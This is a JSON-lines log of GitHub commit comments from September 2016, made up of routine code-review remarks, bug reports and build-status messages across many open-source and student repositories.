{"id":"4613133461","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160287,"position":4,"line":65,"path":"src/client/cl_types.h","commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:30:41Z","updated_at":"2016-09-24T20:30:41Z","body":"I'm not positive, but you might be able to get away with just using time (directly above). Clients don't emit any other timed particle trails, so the time field might be at your disposal."}},"created_at":"2016-09-24T20:30:41Z"}
{"id":"4613135016","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160294,"position":null,"line":null,"path":null,"commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:31:56Z","updated_at":"2016-09-24T20:31:56Z","body":"As for exposing item timers, etc.. config strings are the right tool for the job. See how the \"ready\" and \"time\" strings work. Config strings are managed centrally, and are the same for all connected clients."}},"created_at":"2016-09-24T20:31:56Z"}
{"id":"4613136602","type":"CommitCommentEvent","actor":{"login":"kelvinabrokwa"},"repo":{"name":"cs444-defectives/nachos"},"payload":{"comment":{"id":19160298,"position":null,"line":null,"path":null,"commit_id":"1ce1359d6fffe2d899b31768daf8b630d24c2855","created_at":"2016-09-24T20:33:12Z","updated_at":"2016-09-24T20:33:12Z","body":"why?"}},"created_at":"2016-09-24T20:33:12Z"}
{"id":"4613137115","type":"CommitCommentEvent","actor":{"login":"kaadmy"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19160302,"position":null,"line":null,"path":null,"commit_id":"120d8dce966f9342303ffd1c1b2555bb8c59f24f","created_at":"2016-09-24T20:33:36Z","updated_at":"2016-09-24T20:33:36Z","body":"I've gotten item timers working, now the Quad icon isn't loading."}},"created_at":"2016-09-24T20:33:36Z"}
{"id":"4613138252","type":"CommitCommentEvent","actor":{"login":"keturn"},"repo":{"name":"zulip/zulip"},"payload":{"comment":{"id":19160311,"position":null,"line":null,"path":null,"commit_id":"8cdc5b7a027d0f3c4e1856d9d5cefcc625c61392","created_at":"2016-09-24T20:34:29Z","updated_at":"2016-09-24T20:34:29Z","body":"Huh. It's not clear to me how this resulted in #1830. Can we have a test for this? I'm not finding the word `refs` in the test helpers or test_gitlab at all."}},"created_at":"2016-09-24T20:34:29Z"}
{"id":"4613138665","type":"CommitCommentEvent","actor":{"login":"Gustavo131997"},"repo":{"name":"Gustavo131997/CkecksBus"},"payload":{"comment":{"id":19160312,"position":null,"line":null,"path":null,"commit_id":"aa28b89a718bfad2756f3ebd337a5ff64100e0bd","created_at":"2016-09-24T20:34:49Z","updated_at":"2016-09-24T20:34:49Z","body":"Este ya esta estruturado como va hacer"}},"created_at":"2016-09-24T20:34:49Z"}
{"id":"4613140832","type":"CommitCommentEvent","actor":{"login":"Santikun"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19160331,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T20:36:26Z","updated_at":"2016-09-24T20:36:26Z","body":"Amazing, that fixed it. Once again, thank you. :)"}},"created_at":"2016-09-24T20:36:26Z"}
{"id":"4613142268","type":"CommitCommentEvent","actor":{"login":"jere407407"},"repo":{"name":"jere407407/ppaw"},"payload":{"comment":{"id":19160339,"position":null,"line":null,"path":null,"commit_id":"05ccea72ef3c96e9e63f686b2a8c53c1fa98a9e7","created_at":"2016-09-24T20:37:33Z","updated_at":"2016-09-24T20:37:33Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Club website ~mid-early December](https://trello.com/c/Dvh6KNpJ/39-club-website-mid-early-december)"}},"created_at":"2016-09-24T20:37:33Z"}
{"id":"4613144076","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/spectrum_overload"},"payload":{"comment":{"id":19160349,"position":null,"line":null,"path":null,"commit_id":"4706d3c97a4ebcdc6c25eb3fff683e9b767ed16b","created_at":"2016-09-24T20:38:48Z","updated_at":"2016-09-24T20:38:48Z","body":"Documentation for #3 "}},"created_at":"2016-09-24T20:38:48Z"}
{"id":"4613144989","type":"CommitCommentEvent","actor":{"login":"jimmywarting"},"repo":{"name":"github/fetch"},"payload":{"comment":{"id":19160352,"position":5,"line":123,"path":"README.md","commit_id":"24b64da6e12a9daaa2114a1efabdf8472a06267a","created_at":"2016-09-24T20:39:30Z","updated_at":"2016-09-24T20:39:30Z","body":"Isn't this the same as doing `if (response.ok)` ?"}},"created_at":"2016-09-24T20:39:30Z"}
{"id":"4613146054","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/spectrum_overload"},"payload":{"comment":{"id":19160356,"position":null,"line":null,"path":null,"commit_id":"ee6d506af430d9e0cd4b89912db034ffd09a82b6","created_at":"2016-09-24T20:40:17Z","updated_at":"2016-09-24T20:40:17Z","body":"Adding the interpolation functionality. #3 "}},"created_at":"2016-09-24T20:40:17Z"}
{"id":"4613147626","type":"CommitCommentEvent","actor":{"login":"ilnuribat"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160360,"position":20,"line":56,"path":"bfs.cpp","commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:41:24Z","updated_at":"2016-09-24T20:41:24Z","body":"Тут ошибка\r\n"}},"created_at":"2016-09-24T20:41:24Z"}
{"id":"4613148162","type":"CommitCommentEvent","actor":{"login":"ilnuribat"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160363,"position":22,"line":58,"path":"bfs.cpp","commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:41:49Z","updated_at":"2016-09-24T20:41:49Z","body":"И тут тоже\r\nТакая же\r\n"}},"created_at":"2016-09-24T20:41:49Z"}
{"id":"4613150183","type":"CommitCommentEvent","actor":{"login":"ilnuribat"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160370,"position":17,"line":54,"path":"bfs.cpp","commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:43:19Z","updated_at":"2016-09-24T20:43:19Z","body":"Вот эту точку надо как-то использовать\r\nВзять его координаты i, j и циклом бегать опираясь на них\r\n"}},"created_at":"2016-09-24T20:43:19Z"}
{"id":"4613152254","type":"CommitCommentEvent","actor":{"login":"ilnuribat"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160384,"position":null,"line":null,"path":null,"commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:45:01Z","updated_at":"2016-09-24T20:45:01Z","body":"Ладно, завтра покажу как этой точкой пользоваться"}},"created_at":"2016-09-24T20:45:01Z"}
{"id":"4613153212","type":"CommitCommentEvent","actor":{"login":"learod"},"repo":{"name":"NivelR/tallergit"},"payload":{"comment":{"id":19160387,"position":5,"line":6,"path":"test.txt","commit_id":"4ba435e1706b05cd31d22edbbd9e4266ceca5778","created_at":"2016-09-24T20:45:43Z","updated_at":"2016-09-24T20:45:43Z","body":"Hey mati... que bueno!!!!"}},"created_at":"2016-09-24T20:45:43Z"}
{"id":"4613153686","type":"CommitCommentEvent","actor":{"login":"gitana2016"},"repo":{"name":"tinxo/tallergit"},"payload":{"comment":{"id":19160388,"position":null,"line":null,"path":null,"commit_id":"b09813871908bacbdcf20a51d9fae4bb29925169","created_at":"2016-09-24T20:46:07Z","updated_at":"2016-09-24T20:46:07Z","body":"holas!!!"}},"created_at":"2016-09-24T20:46:07Z"}
{"id":"4613153748","type":"CommitCommentEvent","actor":{"login":"ilnuribat"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160389,"position":null,"line":null,"path":null,"commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:46:11Z","updated_at":"2016-09-24T20:46:11Z","body":"point->getI() вернет число i "}},"created_at":"2016-09-24T20:46:11Z"}
{"id":"4613154799","type":"CommitCommentEvent","actor":{"login":"DevLeoko"},"repo":{"name":"KnightDev/AdvancedBan"},"payload":{"comment":{"id":19160395,"position":null,"line":null,"path":null,"commit_id":"ade6922ac67e3de929f72f640da0f7923ec0c7c4","created_at":"2016-09-24T20:46:59Z","updated_at":"2016-09-24T20:46:59Z","body":"> No offense\r\n\r\nSound for me like an offense to be honest :D\r\nI posted the code here on GitHub so people can learn from it or add new features which they want to have.\r\nAnd the only thing you have done with the code is removing my name and writing your name instead. This is not why I posted my Sourcecode here and I don't care if you use this for personal purposes. It does no make any difference because I'm the original author of this code and I find it very unkind that you removed all my credit even thou you did not even changed one line!"}},"created_at":"2016-09-24T20:46:59Z"}
{"id":"4613155705","type":"CommitCommentEvent","actor":{"login":"Browmis"},"repo":{"name":"Browmis/Labirint"},"payload":{"comment":{"id":19160403,"position":null,"line":null,"path":null,"commit_id":"ec09a390988a7bb1ce27a1e0289b332d54d49981","created_at":"2016-09-24T20:47:38Z","updated_at":"2016-09-24T20:47:38Z","body":"ок . тогда до завтра .\r\n"}},"created_at":"2016-09-24T20:47:38Z"}
{"id":"4613156546","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19160407,"position":null,"line":null,"path":null,"commit_id":"35a865c0ed7a7c097ee555588e66630c76892064","created_at":"2016-09-24T20:48:12Z","updated_at":"2016-09-24T20:48:12Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2315 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.75%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T20:48:12Z"}
{"id":"4613156865","type":"CommitCommentEvent","actor":{"login":"samcorcoran"},"repo":{"name":"samcorcoran/everett"},"payload":{"comment":{"id":19160411,"position":44,"line":0,"path":"nodetools.py","commit_id":"4d798e3f38e37c4d3fe02240fa403b8c20744bcd","created_at":"2016-09-24T20:48:27Z","updated_at":"2016-09-24T20:48:27Z","body":"This can't be reached due to the earlier check for speed equal 1"}},"created_at":"2016-09-24T20:48:27Z"}
{"id":"4613158494","type":"CommitCommentEvent","actor":{"login":"trungducng"},"repo":{"name":"gangstara2/hanu-project"},"payload":{"comment":{"id":19160418,"position":null,"line":null,"path":null,"commit_id":"1f8469085b197c88b2794fc0b56a7bb1973d8cce","created_at":"2016-09-24T20:49:35Z","updated_at":"2016-09-24T20:49:35Z","body":"ô ơi sao t ko push code mới lên dc nhỉ, nó báo lỗi \r\n`To  https://github.com/gangstara2/hanu-project\r\n ! [rejected]        trungducng -> trungducng (non-fast-forward)\r\nerror: failed to push some refs to 'https://github.com/gangstara2/hanu-project'\r\nhint: Updates were rejected because the tip of your current branch is behind\r\nhint: its remote counterpart. Integrate the remote changes (e.g.\r\nhint: 'git pull ...') before pushing again.\r\nhint: See the 'Note about fast-forwards' in 'git push --help' for details`"}},"created_at":"2016-09-24T20:49:35Z"}
{"id":"4613160142","type":"CommitCommentEvent","actor":{"login":"dmit"},"repo":{"name":"BurntSushi/ripgrep"},"payload":{"comment":{"id":19160426,"position":22,"line":329,"path":"src/gitignore.rs","commit_id":"a3fc4cdded50c370698154433600ea51dca390df","created_at":"2016-09-24T20:50:43Z","updated_at":"2016-09-24T20:50:43Z","body":"Typo? `s/was no leading slash/was a leading slash/`?"}},"created_at":"2016-09-24T20:50:43Z"}
{"id":"4613163562","type":"CommitCommentEvent","actor":{"login":"ahlexh"},"repo":{"name":"ahlexh/hello_world"},"payload":{"comment":{"id":19160449,"position":3,"line":3,"path":"README.md","commit_id":"eaad989fe6f32169ac2e15e4a2cf2bdc568cdf55","created_at":"2016-09-24T20:53:23Z","updated_at":"2016-09-24T20:53:23Z","body":"coco2"}},"created_at":"2016-09-24T20:53:23Z"}
{"id":"4613165095","type":"CommitCommentEvent","actor":{"login":"murilao"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19160473,"position":null,"line":null,"path":null,"commit_id":"674fcc7471a2425b285855bd800347e7990d607d","created_at":"2016-09-24T20:54:36Z","updated_at":"2016-09-24T20:54:36Z","body":"Well the previous is bugged because when passed level 130 it still was free bless."}},"created_at":"2016-09-24T20:54:36Z"}
{"id":"4613166701","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19160486,"position":null,"line":null,"path":null,"commit_id":"a6d9fbc2f814d9fc0562f7ced9dc214e22818926","created_at":"2016-09-24T20:55:46Z","updated_at":"2016-09-24T20:55:46Z","body":"by adding this commit it crashed the client when login in (using client 10.98), but when using other clients as 10.97, 10.96 there is no debug until you try to change outfit (if you modified outfits.xml or mounts.xml)"}},"created_at":"2016-09-24T20:55:46Z"}
{"id":"4613167043","type":"CommitCommentEvent","actor":{"login":"samcorcoran"},"repo":{"name":"samcorcoran/everett"},"payload":{"comment":{"id":19160491,"position":51,"line":0,"path":"nodetools.py","commit_id":"4d798e3f38e37c4d3fe02240fa403b8c20744bcd","created_at":"2016-09-24T20:56:00Z","updated_at":"2016-09-24T20:56:00Z","body":"Should move this functionality into a function in spherepoints which accepts two locations and gives you the bearing between them."}},"created_at":"2016-09-24T20:56:00Z"}
{"id":"4613169104","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19160504,"position":null,"line":null,"path":null,"commit_id":"fb366931ff3585fc73f62ff3c06637b08e6d4617","created_at":"2016-09-24T20:57:32Z","updated_at":"2016-09-24T20:57:32Z","body":"by adding this commit it crashed the client when login in (using client 10.98), but when using other clients as 10.97, 10.96 there is no debug until you try to change outfit (if you modified outfits.xml or mounts.xml)"}},"created_at":"2016-09-24T20:57:32Z"}
{"id":"4613169244","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19160505,"position":null,"line":null,"path":null,"commit_id":"ddbb981f5ef79070c208d6c44f2cb16ac13fe6b3","created_at":"2016-09-24T20:57:37Z","updated_at":"2016-09-24T20:57:37Z","body":"\nBuild report #162481363 for sha ddbb981f5ef79070c208d6c44f2cb16ac13fe6b3:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-13.84%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3859%20/%2010046%20%2838.41%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-34.97%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-24T20:57:37Z"}
{"id":"4613173101","type":"CommitCommentEvent","actor":{"login":"koush"},"repo":{"name":"elevenfive/AndroidAsync"},"payload":{"comment":{"id":19160527,"position":89,"line":360,"path":"AndroidAsync/src/com/koushikdutta/async/http/HybiParser.java","commit_id":"1b7f44cd463aa1dcfe6bd5a682c15ca21e0352b5","created_at":"2016-09-24T21:00:29Z","updated_at":"2016-09-24T21:00:29Z","body":"Should probably wrap/throw the original DataFormatException e:\r\n\r\nnew IOException(\"invalid deflated data\", e);"}},"created_at":"2016-09-24T21:00:29Z"}
{"id":"4613175182","type":"CommitCommentEvent","actor":{"login":"mcourteaux"},"repo":{"name":"cinquin/MultiTouch-Gestures-Java"},"payload":{"comment":{"id":19160545,"position":null,"line":null,"path":null,"commit_id":"be810d7547ea0ba327a7ddac2ae3e470e1125671","created_at":"2016-09-24T21:01:55Z","updated_at":"2016-09-24T21:01:55Z","body":"Ah, yeah. I don't really care :D Treat it as it's WTFPL licensed. :)"}},"created_at":"2016-09-24T21:01:55Z"}
{"id":"4613175614","type":"CommitCommentEvent","actor":{"login":"Techcable"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19160548,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-24T21:02:17Z","updated_at":"2016-09-24T21:02:17Z","body":"Lol, I love how this crashes the server :trollface: "}},"created_at":"2016-09-24T21:02:17Z"}
{"id":"4613176353","type":"CommitCommentEvent","actor":{"login":"waylan"},"repo":{"name":"waylan/Python-Markdown"},"payload":{"comment":{"id":19160553,"position":5,"line":67,"path":"tests/extensions/attr_list.html","commit_id":"5881ae5235de7e8d57703aa33f49ed5fe7b79fee","created_at":"2016-09-24T21:02:50Z","updated_at":"2016-09-24T21:02:50Z","body":"At a glance I thought the same thing. But the regex explicitly excluded `=` from the value and not from the key (yesterday's change excludes it from the key also). In the end it doesn't matter as no groups are referenced later. A string.split is used instead. "}},"created_at":"2016-09-24T21:02:50Z"}
{"id":"4613177725","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"bitinn/node-fetch"},"payload":{"comment":{"id":19160561,"position":1,"line":1,"path":"test/server.js","commit_id":"e926483448c675b7443d2c085c49cee9d4619120","created_at":"2016-09-24T21:03:50Z","updated_at":"2016-09-24T21:03:50Z","body":"Thanks for merging my PR, and sorry for the formatting changes.\r\n\r\nJust curious, why start files with an empty line?"}},"created_at":"2016-09-24T21:03:50Z"}
{"id":"4613178878","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19160569,"position":6,"line":27,"path":"framework/CHANGELOG.md","commit_id":"3ba72da6fa11c7565de7ceb002bdf6ff86c841d4","created_at":"2016-09-24T21:04:40Z","updated_at":"2016-09-24T21:04:40Z","body":"Oh. Seems I've pushed https://github.com/yiisoft/yii2/commit/742c45a2c7f967ae6deffa4339cf6662c8fda6c7 with rebasing and somehow it was merged bad again :)"}},"created_at":"2016-09-24T21:04:40Z"}
{"id":"4613183389","type":"CommitCommentEvent","actor":{"login":"sudhars1896"},"repo":{"name":"sudhars1896/sandwich"},"payload":{"comment":{"id":19160589,"position":null,"line":null,"path":null,"commit_id":"5edf0889dc416a24d0927d008013784923bb3fa4","created_at":"2016-09-24T21:08:00Z","updated_at":"2016-09-24T21:08:00Z","body":"logcat of the app"}},"created_at":"2016-09-24T21:08:00Z"}
{"id":"4613183638","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19160590,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-24T21:08:10Z","updated_at":"2016-09-24T21:08:10Z","body":"\r\nOn line 859, the result will always be 0.\r\nin c++, if you divide 2 integers 1 and 85, it will make an integer and truncate towards 0.\r\n\r\nTo avoid this, if one operand is non integer, such as 1/85.0, will give a non zero float.\r\nor simply (100-pos.rule50_count()) / 85.0;\r\n\r\nAt least we learned something. A brutal score = 0 when rule50_count > 15 is just as strong as master.\r\nSo maybe we do not need line 858 and maybe the following could work !\r\n`score *= 1.0 - pos.rule50_count()/100.0;`\r\n\r\nAnother consideration is that line 855 to 857 are already tested in evaluate_scale_factor which is called just below. \r\nWe see that for opposite bishop, the scale factor will be\r\n                sf = more_than_one(pos.pieces(PAWN)) ? ScaleFactor(31) : ScaleFactor(9);\r\n\r\nSo at the end, master will change the score like this for those endings:\r\n score *= 31/64 or score *=9/64\r\n\r\nA more efficient implementation of your idea would change this 31 and 9 directly."}},"created_at":"2016-09-24T21:08:10Z"}
{"id":"4613188203","type":"CommitCommentEvent","actor":{"login":"synman"},"repo":{"name":"synman/PokeBack"},"payload":{"comment":{"id":19160619,"position":null,"line":null,"path":null,"commit_id":"8bcf7d3f8666e41aa7c9b2a464873dea6010524d","created_at":"2016-09-24T21:11:50Z","updated_at":"2016-09-24T21:11:50Z","body":"thanks"}},"created_at":"2016-09-24T21:11:50Z"}
{"id":"4613188421","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19160620,"position":25,"line":117,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-24T21:12:01Z","updated_at":"2016-09-24T21:12:01Z","body":"Ah, I see now, great catch!"}},"created_at":"2016-09-24T21:12:01Z"}
{"id":"4613190616","type":"CommitCommentEvent","actor":{"login":"tarang9211"},"repo":{"name":"aditya234123/APILearning"},"payload":{"comment":{"id":19160631,"position":27,"line":37,"path":"SurlSession/ViewController.swift","commit_id":"d931eb541ccde1f152e29a8a954eb9f66eca0be6","created_at":"2016-09-24T21:13:36Z","updated_at":"2016-09-24T21:13:36Z","body":"Try this `print(JSON(data))`"}},"created_at":"2016-09-24T21:13:36Z"}
{"id":"4613191497","type":"CommitCommentEvent","actor":{"login":"holiman"},"repo":{"name":"Gustav-Simonsson/go-ethereum"},"payload":{"comment":{"id":19160635,"position":44,"line":100,"path":"core/state/statedb.go","commit_id":"94ba7de5fca91cca17e2da38c397f77d1ac75698","created_at":"2016-09-24T21:14:12Z","updated_at":"2016-09-24T21:14:12Z","body":"Wut? foundCommonRoot is never set to true"}},"created_at":"2016-09-24T21:14:12Z"}
{"id":"4613192043","type":"CommitCommentEvent","actor":{"login":"davidosomething"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19160638,"position":11,"line":185,"path":"autoload/neomake/utils.vim","commit_id":"b49189af6c3b098f6b7df5fc8232b7729bdcc17e","created_at":"2016-09-24T21:14:36Z","updated_at":"2016-09-24T21:14:36Z","body":"Getting \r\n```\r\nE691: Can only compare List with List\r\nE15: Invalid expression: has_key(g:, config_var) || getbufvar(a:bufnr, config_var) !=# ''\r\n```\r\n\r\nprobably for the getbufvar comparison"}},"created_at":"2016-09-24T21:14:36Z"}
{"id":"4613192194","type":"CommitCommentEvent","actor":{"login":"holiman"},"repo":{"name":"Gustav-Simonsson/go-ethereum"},"payload":{"comment":{"id":19160641,"position":54,"line":110,"path":"core/state/statedb.go","commit_id":"94ba7de5fca91cca17e2da38c397f77d1ac75698","created_at":"2016-09-24T21:14:42Z","updated_at":"2016-09-24T21:14:42Z","body":"So this else-block will never enter...\r\n"}},"created_at":"2016-09-24T21:14:42Z"}
{"id":"4613194124","type":"CommitCommentEvent","actor":{"login":"jhcole"},"repo":{"name":"FozLand/chat_next"},"payload":{"comment":{"id":19160651,"position":null,"line":null,"path":null,"commit_id":"ae94d59ab5c67f727864ddc89c33d90d132a5727","created_at":"2016-09-24T21:16:09Z","updated_at":"2016-09-24T21:16:09Z","body":"This is awesome !"}},"created_at":"2016-09-24T21:16:09Z"}
{"id":"4613194277","type":"CommitCommentEvent","actor":{"login":"indymx"},"repo":{"name":"twbs/bootstrap"},"payload":{"comment":{"id":19160652,"position":null,"line":null,"path":null,"commit_id":"a483e853015055355dcb96846829c5ec91810a88","created_at":"2016-09-24T21:16:13Z","updated_at":"2016-09-24T21:16:13Z","body":"multiple select scroll boxes were breaking out of their container making them unusable. This corrects that. Also there was an extra text-decoration that could be removed from abbr[title]"}},"created_at":"2016-09-24T21:16:13Z"}
{"id":"4613194523","type":"CommitCommentEvent","actor":{"login":"davidosomething"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19160654,"position":11,"line":185,"path":"autoload/neomake/utils.vim","commit_id":"b49189af6c3b098f6b7df5fc8232b7729bdcc17e","created_at":"2016-09-24T21:16:27Z","updated_at":"2016-09-24T21:16:27Z","body":"@blueyed "}},"created_at":"2016-09-24T21:16:27Z"}
{"id":"4613196129","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19160661,"position":55,"line":316,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-24T21:17:44Z","updated_at":"2016-09-24T21:17:44Z","body":":+1: "}},"created_at":"2016-09-24T21:17:44Z"}
{"id":"4613197639","type":"CommitCommentEvent","actor":{"login":"dinatih"},"repo":{"name":"activerecord-hackery/ransack_demo"},"payload":{"comment":{"id":19160669,"position":null,"line":null,"path":null,"commit_id":"3bd10a6788cb9b0071b40daaefeff50d47753798","created_at":"2016-09-24T21:18:54Z","updated_at":"2016-09-24T21:18:54Z","body":"Hello,\r\n\r\nI got this error : `wrong number of arguments (given 0, expected 1..4)` on `tag` method.\r\nThe doc http://api.rubyonrails.org/classes/ActionView/Helpers/TagHelper.html#method-i-tag, doesn't seem to use the method like you. Did I miss something somewhere ? \r\n\r\nThank's.\r\n\r\nRails 5.0.0.1"}},"created_at":"2016-09-24T21:18:54Z"}
{"id":"4613198020","type":"CommitCommentEvent","actor":{"login":"czjuarez"},"repo":{"name":"czjuarez/601"},"payload":{"comment":{"id":19160671,"position":null,"line":null,"path":null,"commit_id":"e6673ae7753388c12775977177e997dcd3b43aa0","created_at":"2016-09-24T21:19:14Z","updated_at":"2016-09-24T21:19:14Z","body":"Space for 601 updates. Keep track of new items. Possible quiz solutions"}},"created_at":"2016-09-24T21:19:14Z"}
{"id":"4613198097","type":"CommitCommentEvent","actor":{"login":"KostyaSha"},"repo":{"name":"abayer/workflow-job-plugin"},"payload":{"comment":{"id":19160673,"position":18,"line":156,"path":"src/main/java/org/jenkinsci/plugins/workflow/job/properties/PipelineTriggersJobProperty.java","commit_id":"d49d3c275e5fdccdab9f126e20eb553ece847ae6","created_at":"2016-09-24T21:19:18Z","updated_at":"2016-09-24T21:19:18Z","body":"LOG error?"}},"created_at":"2016-09-24T21:19:18Z"}
{"id":"4613198186","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19160675,"position":103,"line":635,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-24T21:19:22Z","updated_at":"2016-09-24T21:19:22Z","body":"Sure"}},"created_at":"2016-09-24T21:19:22Z"}
{"id":"4613200682","type":"CommitCommentEvent","actor":{"login":"kaszti1337"},"repo":{"name":"ClockSelect/myevic"},"payload":{"comment":{"id":19160691,"position":null,"line":null,"path":null,"commit_id":"760f127b2209f7d88e65c5d27001cd346764f2ba","created_at":"2016-09-24T21:21:20Z","updated_at":"2016-09-24T21:21:20Z","body":"beautiful firmware! I can change screen saver animation or image? I want to do my screensaver animation!"}},"created_at":"2016-09-24T21:21:20Z"}
{"id":"4613201000","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"brion/ogv.js"},"payload":{"comment":{"id":19160695,"position":14,"line":458,"path":"src/js/StreamFile.js","commit_id":"8e8a0dbfc25980ffb75cc5b7b5f6b6821c23aab0","created_at":"2016-09-24T21:21:37Z","updated_at":"2016-09-24T21:21:37Z","body":"If I set this just a bit above and move that bit down it works."}},"created_at":"2016-09-24T21:21:37Z"}
{"id":"4613201542","type":"CommitCommentEvent","actor":{"login":"Dinoyan"},"repo":{"name":"ViperXYZ/ProjectX"},"payload":{"comment":{"id":19160697,"position":null,"line":null,"path":null,"commit_id":"188707bfd3541972e9bae93f2a621067f01a864d","created_at":"2016-09-24T21:22:07Z","updated_at":"2016-09-24T21:22:07Z","body":"Changed the directory to match the backend directory"}},"created_at":"2016-09-24T21:22:07Z"}
{"id":"4613207137","type":"CommitCommentEvent","actor":{"login":"jfmengels"},"repo":{"name":"benmosher/eslint-plugin-import"},"payload":{"comment":{"id":19160726,"position":null,"line":null,"path":null,"commit_id":"e3c41ca4005738757815906f1b615810e98f9e6a","created_at":"2016-09-24T21:26:27Z","updated_at":"2016-09-24T21:26:27Z","body":"Maybe add a link to an issue or some explanation as to why these rules are commented?\r\n\r\nAnd maybe we don't want to delete this rule, but we could delete the parts of the rule that are not needed anymore?"}},"created_at":"2016-09-24T21:26:27Z"}
{"id":"4613208502","type":"CommitCommentEvent","actor":{"login":"doctormee"},"repo":{"name":"doctormee/neuro-framework"},"payload":{"comment":{"id":19160732,"position":null,"line":null,"path":null,"commit_id":"d4ac22ae36d344d3e2b837cb615be22caf559e1d","created_at":"2016-09-24T21:27:34Z","updated_at":"2016-09-24T21:27:34Z","body":"Вынес в публичные параметры списки input_list и output_list для node;\r\n\r\nреализовал обобщенный список"}},"created_at":"2016-09-24T21:27:34Z"}
{"id":"4613208906","type":"CommitCommentEvent","actor":{"login":"BurntSushi"},"repo":{"name":"BurntSushi/ripgrep"},"payload":{"comment":{"id":19160734,"position":22,"line":329,"path":"src/gitignore.rs","commit_id":"a3fc4cdded50c370698154433600ea51dca390df","created_at":"2016-09-24T21:27:55Z","updated_at":"2016-09-24T21:27:55Z","body":"Right, thanks."}},"created_at":"2016-09-24T21:27:55Z"}
